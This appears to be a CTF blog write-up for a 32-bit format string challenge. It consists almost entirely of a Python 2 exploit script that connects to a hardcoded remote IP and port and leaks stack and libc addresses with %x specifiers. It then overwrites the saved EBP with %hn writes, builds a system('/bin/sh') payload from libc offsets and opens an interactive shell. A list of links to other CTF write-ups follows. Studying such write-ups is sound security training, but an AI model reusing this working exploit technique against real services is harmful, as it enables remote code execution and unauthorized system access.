32-bit Format String Bug
Exploit: Fake EBP
difference of library made me go nuts
from socket import *
import re
from struct import pack
p = lambda x: pack("<I", x)
def recv_until(s, data):
p = s.recv(1)
while data not in p:
p += s.recv(1)
return p
def shell(s):
from telnetlib import Telnet
t = Telnet()
t.sock = s
t.interact()
s = socket(2,1)
s.connect(('54.165.223.128', 2555))
# leak EBP
recv_until(s, '>>> ')
s.send('1\n')
s.send('BBBB1\n')
s.send('0101234\n')
s.send('512\n')
s.send('%6$x\n')
recv_until(s, '>>> ')
s.send('4\n')
EBP = recv_until(s, '>>> ')
EBP = re.findall("Description: (.+)", EBP)[0]
EBP = int(EBP, 16)
print 'EBP =',hex(EBP)
# leak library address
s.send('1\n')
s.send('BBBB2\n')
s.send('0101234\n')
s.send('512\n')
s.send('%2$x\n')
recv_until(s, '>>> ')
s.send('4\n')
data = recv_until(s, '>>> ')
t = re.findall("Description: (.+)", data)[1]
t = int(t, 16)
print 'SYSTEM_LIB', hex(t)
s.send('1\n')
s.send('BBBB3\n')
s.send('0101234\n')
s.send('512\n')
s.send('%2$x\n')
recv_until(s, '>>> ')
s.send('1\n')
s.send('BBBB4\n')
s.send('0101234\n')
s.send('512\n')
s.send('%2$x\n')
recv_until(s, '>>> ')
s.send('1\n')
s.send('BBBB5\n')
s.send('0101234\n')
s.send('512\n')
s.send('%2$x\n')
recv_until(s, '>>> ')
s.send('1\n')
s.send('BBBB6\n')
s.send('0101234\n')
s.send('512\n')
s.send('%45860c%6$hn\n')
recv_until(s, '>>> ')
s.send('1\n')
s.send('BBBB7\n')
s.send('0101234\n')
s.send('512\n')
payload = '%'+`((EBP+2)&0xffff)`.rstrip('L')+'c%33$hn'
s.send(payload+'\n')
print payload
recv_until(s, '>>> ')
s.send('1\n')
s.send('BBBB8\n')
s.send('0101234\n')
s.send('512\n')
s.send('%2052c%69$hn\n')
system_libc = t - 53777 + 2 # this made me crazy... server libc != local libc
binsh = system_libc + 1181844
recv_until(s, '>>> ')
s.send('1\n')
payload = p(system_libc)
payload += p(binsh)*3
s.send(payload + '\n')
s.send('0101234\n')
s.send('512\n')
s.send('ASDF\n') # 0x804b324
recv_until(s, '>>> ')
s.send('4\n')
recv_until(s, '>>> ')
print 'Done'
shell(s)
'CTF' 카테고리의 다른 글
| Boston Key Party 2016 Cookbook (pwnable 6) Writeup (KR) (0) | 2016.03.07 |
|---|---|
| HDCON 2015 Track3 writeup (0) | 2015.11.19 |
| CSAW CTF 2015 rhinoxorus (exploitable500) writeup (KR) (0) | 2015.09.21 |
| Defcon23 (2015) mathwhiz (baby's first 1) writeup (EN) (0) | 2015.05.21 |
| Defcon23 (2015) mathwhiz (baby's first 1) writeup (KR) (0) | 2015.05.21 |